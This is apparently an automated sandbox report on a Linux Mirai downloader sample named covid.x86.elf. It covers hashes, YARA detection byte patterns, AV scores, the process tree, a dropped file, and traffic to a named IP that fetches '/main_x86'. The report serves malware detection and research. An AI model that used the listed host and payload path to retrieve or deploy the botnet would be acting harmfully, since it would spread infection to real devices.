Edit tour

Linux Analysis Report
covid.x86.elf

Overview

General Information

Sample name:	covid.x86.elf
Analysis ID:	1584849
MD5:	525a61eb31c84f06ca81ac9dd3fc351c
SHA1:	b33103e0fd651148778f7b10a574ea7b3352f239
SHA256:	9056d031d3d7d225d98d14fb96f5dbf154457692ab7b3e536fab71dd1da2ad3d
Tags:	elfuser-abuse_ch
Infos:

Detection

Mirai

Score:	80
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Mirai

Machine Learning detection for dropped file

Machine Learning detection for sample

Executes the "rm" command used to delete files or directories

HTTP GET or POST without a user agent

Sample has stripped symbol table

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584849
Start date and time:	2025-01-06 16:22:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	covid.x86.elf
Detection:	MAL
Classification:	mal80.troj.linELF@0/1@0/0

Warnings

Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

Command:	/tmp/covid.x86.elf
PID:	6215
Exit Code:	5
Exit Code Info:
Killed:	False
Standard Output:	Loadinggg Downloaddd
Standard Error:

Process Tree

system is lnxubuntu20

dash New Fork (PID: 6194, Parent: 4331)

rm (PID: 6194, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ

dash New Fork (PID: 6195, Parent: 4331)

rm (PID: 6195, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ

covid.x86.elf (PID: 6215, Parent: 6128, MD5: 525a61eb31c84f06ca81ac9dd3fc351c) Arguments: /tmp/covid.x86.elf

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
covid.x86.elf	Linux_Trojan_Mirai_88a1b067	unknown	unknown	0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x111af:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111c3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111d7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111eb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x111ff:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11213:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11227:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1123b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1124f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11263:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11277:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1128b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1129f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x112b3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x112c7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x112db:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x112ef:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11303:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11317:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1132b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1133f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
dump.pcap	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x45a5:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
dump.pcap	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x97d1:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
dump.pcap	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x5e1b:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
dump.pcap	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xcce7:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
dump.pcap	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xb26d:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
dump.pcap	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x5deb:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
/tmp/condi72	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
/tmp/condi72	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0xf59c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf5b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf5c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf5d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf5ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf600:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf614:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf628:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf63c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf650:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf664:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf678:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf68c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf6a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf6b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf6c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf6dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf6f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf704:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf718:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xf72c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
/tmp/condi72	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x3b30:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
/tmp/condi72	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0x84b6:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
/tmp/condi72	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x5072:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
/tmp/condi72	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xb5a2:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
/tmp/condi72	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0x9d66:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
/tmp/condi72	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x5042:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6215.1.0000000008049000.000000000804a000.rw-.sdmp	Linux_Trojan_Mirai_88a1b067	unknown	unknown	0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10
6215.1.0000000008048000.0000000008049000.r-x.sdmp	Linux_Trojan_Mirai_88a1b067	unknown	unknown	0x91:$a: 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: /tmp/condi72

Avira: detection malicious, Label: EXP/ELF.Mirai.Z.A

Multi AV Scanner detection for submitted file

Source: covid.x86.elf	Virustotal: Detection: 29%			Perma Link
Source: covid.x86.elf	ReversingLabs: Detection: 60%

Machine Learning detection for dropped file

Source: /tmp/condi72

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: covid.x86.elf

Joe Sandbox ML: detected

Source: global traffic

HTTP traffic detected: GET /main_x86 HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo

Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.255.135.104
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43

Source: global traffic

HTTP traffic detected: GET /main_x86 HTTP/1.0Data Raw: 00 44 6f 77 6e 6c 6f Data Ascii: Downlo

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: covid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
Source: 6215.1.0000000008049000.000000000804a000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: 6215.1.0000000008048000.0000000008049000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88a1b067 Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown

Source: ELF static info symbol of initial sample

.symtab present: no

Source: covid.x86.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: dump.pcap, type: PCAP	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6215.1.0000000008049000.000000000804a000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: 6215.1.0000000008048000.0000000008049000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88a1b067 severity = 100, os = linux, arch_context = x86, creation_date = 2021-06-28, scan_context = file, memory, reference = 1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f, id = 88a1b067-11d5-4128-b763-2d1747c95eef, last_modified = 2021-09-16
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: /tmp/condi72, type: DROPPED	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal80.troj.linELF@0/1@0/0

Source: /usr/bin/dash (PID: 6194)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ			Jump to behavior
Source: /usr/bin/dash (PID: 6195)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.d4L4fAXtNl /tmp/tmp.At6GiEB5SN /tmp/tmp.sGKyhX36XJ			Jump to behavior

Source: /tmp/covid.x86.elf (PID: 6215)

File written: /tmp/condi72

Jump to dropped file

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: /tmp/condi72, type: DROPPED

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: /tmp/condi72, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 File Deletion	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
covid.x86.elf	30%	Virustotal		Browse
covid.x86.elf	61%	ReversingLabs	Linux.Downloader.Mirai
covid.x86.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/tmp/condi72	100%	Avira	EXP/ELF.Mirai.Z.A
/tmp/condi72	100%	Joe Sandbox ML
